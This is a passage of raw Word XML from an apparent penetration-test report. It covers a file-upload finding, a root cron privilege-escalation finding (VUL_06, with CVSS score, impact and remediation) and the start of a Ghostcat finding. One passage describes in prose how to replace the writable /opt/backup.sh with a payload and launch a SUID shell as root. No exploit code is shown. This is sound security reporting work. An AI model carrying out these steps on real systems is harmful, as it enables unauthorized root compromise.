                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>Trigger the uploaded payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D84933" w:rsidRPr="00D77DFE" w14:paraId="00C9DA03"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D188598" w14:textId="77777777" w:rsidR="00D84933" w:rsidRPr="00D77DFE" w:rsidRDefault="00D84933" w:rsidP="00D84933">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:color w:val="0D0D0D" w:themeColor="text1" w:themeTint="F2"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Proof of concept:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00145D28" w:rsidRPr="00D77DFE" w14:paraId="32E72845"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9FEE6C0" w14:textId="60056E97" w:rsidR="00145D28" w:rsidRPr="00D77DFE" w:rsidRDefault="00145D28" w:rsidP="00145D28">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix </w:t>
            </w:r>
            <w:r w:rsidR="009E4D57" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA51" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t xml:space="preserve">Figure </w:t>
              </w:r>
              <w:r w:rsidR="00DB00A5" w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>A.</w:t>
              </w:r>
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>5.1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:hyperlink w:anchor="FigureA52" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>Figure B5.2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00145D28" w:rsidRPr="00D77DFE" w14:paraId="5B217532" w14:textId="77777777" w:rsidTr="00094048">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900B4B5" w14:textId="77777777" w:rsidR="00145D28" w:rsidRPr="00D77DFE" w:rsidRDefault="00145D28" w:rsidP="00145D28">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00145D28" w:rsidRPr="00D77DFE" w14:paraId="02217F72" w14:textId="77777777" w:rsidTr="00094048">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22C8CC8" w14:textId="09821534" w:rsidR="00145D28" w:rsidRPr="00D77DFE" w:rsidRDefault="00145D28" w:rsidP="00DF46CA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId36" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/434.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00DF46CA" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>http://portswigger.net/web-security/file-upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E172743" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="00D84933">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9439" w:type="dxa"/>
        <w:tblInd w:w="-48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866A98" w:rsidRPr="00D77DFE" w14:paraId="722992C0" w14:textId="77777777" w:rsidTr="00BC7221">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85CFB83" w14:textId="7E52BF37" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98" w:rsidP="009E5B3F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Unauthorized modification of scheduled jobs (crontab)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00866A98" w:rsidRPr="00D77DFE" w14:paraId="2CA03F6B" w14:textId="77777777" w:rsidTr="00BC7221">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FEFB880" w14:textId="77777777" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98"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A85DDF0" w14:textId="1F44AC79" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98"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866A98" w:rsidRPr="00D77DFE" w14:paraId="7F288AEA" w14:textId="77777777" w:rsidTr="00BC7221">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AADAFAF" w14:textId="444CE52E" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98"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VUL_06</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4398ED0" w14:textId="28995CC0" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00640EA0"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57568" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32CB9F4E" wp14:editId="7E9FB94B">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>836103</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>58893</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1474654683"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chemeClr val="accent2"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:schemeClr val="accent2"/>
                                </a:solidFill>
                                <a:round/>
                                <a:headEnd/>
                                <a:tailEnd/>
                              </a:ln>
                            </wps:spPr>
                            <wps:txbx>
                              <w:txbxContent>
                                <w:p w14:paraId="71B00281" w14:textId="77777777" w:rsidR="00866A98" w:rsidRPr="00882E87" w:rsidRDefault="00866A98" w:rsidP="00866A98">
                                  <w:pPr>
                                    <w:rPr>
                                      <w:lang w:val="pl-P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CB9F4E" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1029" style="position:absolute;left:0;text-align:left;margin-left:65.85pt;margin-top:4.65pt;width:125.8pt;height:10.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" fillcolor="#e97132 [3205]" strokecolor="#e97132 [3205]">
                      <v:path arrowok="t"/>
                      <v:textbox>
                        <w:txbxContent>
                          <w:p w14:paraId="71B00281" w14:textId="77777777" w:rsidR="00866A98" w:rsidRPr="00882E87" w:rsidRDefault="00866A98" w:rsidP="00866A98">
                            <w:pPr>
                              <w:rPr>
                                <w:lang w:val="pl-PL"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                        </w:txbxContent>
                      </v:textbox>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidR="00866A98" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00866A98" w:rsidRPr="00D77DFE" w14:paraId="1FB68FBF" w14:textId="77777777" w:rsidTr="00BC7221">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1662C8A" w14:textId="77777777" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98"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7.8</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7C79BF3" w14:textId="77777777" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98"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866A98" w:rsidRPr="00D77DFE" w14:paraId="2CFD7210" w14:textId="77777777" w:rsidTr="00BC7221">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9B55D64" w14:textId="77777777" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98"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S:U</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/C:H/I:H/A:H</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DCC9858" w14:textId="77777777" w:rsidR="00866A98" w:rsidRPr="00D77DFE" w:rsidRDefault="00866A98" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-269: Improper Privilege Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="2FD94CDC" w14:textId="77777777" w:rsidTr="00BC7221">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20DA0AA" w14:textId="1CC03AB4" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB"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FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="2E889C50" w14:textId="77777777" w:rsidTr="00BC7221">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64BA1BC" w14:textId="334CDC07" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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Bash script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="632B4BE9" w14:textId="77777777" w:rsidTr="00BC7221">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1B90CC1" w14:textId="693F9DD7" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="5570B2C6" w14:textId="77777777" w:rsidTr="00BC7221">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647A424" w14:textId="5BC66601" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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A root‑executed cron job runs a writable script, allowing the user sopot to modify it and execute arbitrary code as root, resulting in full system compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="4764C6DF" w14:textId="77777777" w:rsidTr="00BC7221">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CD7A1BF" w14:textId="75499600" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="7C6D2AD4" w14:textId="77777777" w:rsidTr="00BC7221">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4DBB9A2" w14:textId="5974F9B2" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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 xml:space="preserve"> 10.0.2.178</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="7FFF0738"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0EB5A97" w14:textId="6749118F" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="333A8EA0"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D2B29EC" w14:textId="77777777" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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Execute arbitrary commands with full root privileges.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF42C61" w14:textId="77777777" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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Create or modify system binaries, backdoors, or persistent root access.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ABB6C67" w14:textId="615789EF" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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Access, modify, or delete any file on the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="1508F97D"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246E697" w14:textId="19F37D22" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="49829F7D"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BA7BC43" w14:textId="77777777" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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 xml:space="preserve">Remove write permissions for non‑root users on any script executed by </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4319A2AD" w14:textId="5B544CF0" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">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Review and correct group memberships; remove unsafe privilege assignments (e.g., admins group with elevated permissions). Never allow users to modify files executed as root.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="0A47336A"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2EEB29E" w14:textId="2E1AC527" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>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FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="0D005395"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57BE4AB" w14:textId="25602AAD" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>While logged in as sopot, confirm membership in the admins group, identify that the root cron job executes the writable /opt/backup.sh, replace the script with a privilege‑escalation payload, wait for cron to run it as root, and then launch the created SUID shell to obtain full root access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="1F5343CB"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A6993AD" w14:textId="77777777" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00A81422">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>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FE4EDB" w:rsidRPr="00D77DFE" w14:paraId="1E647A37" w14:textId="77777777" w:rsidTr="00BC7221">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BF69950" w14:textId="0B9B81FB" w:rsidR="00FE4EDB" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE4EDB" w:rsidP="00FE4EDB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Proof of Concept evidence is provided in Appendix A, </w:t>
            </w:r>
            <w:hyperlink w:anchor="_Figure_A.6_Unauthorized" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:bCs/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>Figure A.6</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:color w:val="0D0D0D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00431D09" w:rsidRPr="00D77DFE" w14:paraId="2138D15D" w14:textId="77777777" w:rsidTr="00BC7221">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FB155E4" w14:textId="7D4B55EA" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00FE4EDB">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431D09" w:rsidRPr="00D77DFE" w14:paraId="5BA25DD7" w14:textId="77777777" w:rsidTr="00BC7221">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FE552B2" w14:textId="75AAF25F" w:rsidR="00431D09" w:rsidRPr="00D77DFE" w:rsidRDefault="00431D09" w:rsidP="00431D09">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId37" w:history="1">
              <w:r w:rsidRPr="00D77DFE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cwe.mitre.org/data/definitions/269.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>https://cwe.mitre.org/data/definitions/732.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="406626A9" w14:textId="77777777" w:rsidR="006B5228" w:rsidRPr="00D77DFE" w:rsidRDefault="006B5228" w:rsidP="006B5228">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>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5F0478" w:rsidRPr="00D77DFE" w14:paraId="1FA014DB" w14:textId="77777777" w:rsidTr="007B6EB7">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2A7EF9D" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478" w:rsidP="00C420B0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0E2841" w:themeColor="text2"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVE‑2020‑1938 (Ghostcat) Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F0478" w:rsidRPr="00D77DFE" w14:paraId="090B8B09" w14:textId="77777777" w:rsidTr="007B6EB7">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B4CDF96" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478"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F2A6904" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478"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5F0478" w:rsidRPr="00D77DFE" w14:paraId="546F592D"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AE17DD0" w14:textId="2933FDAA" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478"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VUL_07</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7A4481D" w14:textId="77777777" w:rsidR="005F0478" w:rsidRPr="00D77DFE" w:rsidRDefault="005F0478"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59616" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6F9FAD8C" wp14:editId="06316252">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>850973</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>24292</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="1597660" cy="127635"/>
                      <wp:effectExtent l="0" t="0" r="21590" b="24765"/>
                      <wp:wrapNone/>
                      <wp:docPr id="3048028"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chemeClr val="accent2"/>
                              </a:solidFill>
                              <a:ln w="9525">
                                <a:solidFill>
                                  <a:schemeClr val="accent2"/>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496895" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:67pt;margin-top:1.9pt;width:125.8pt;height:10.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" fillcolor="#e97132 [3205]" strokecolor="#e97132 [3205]">
                      <v:path arrowok="t"/>
                    </v:roundrect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
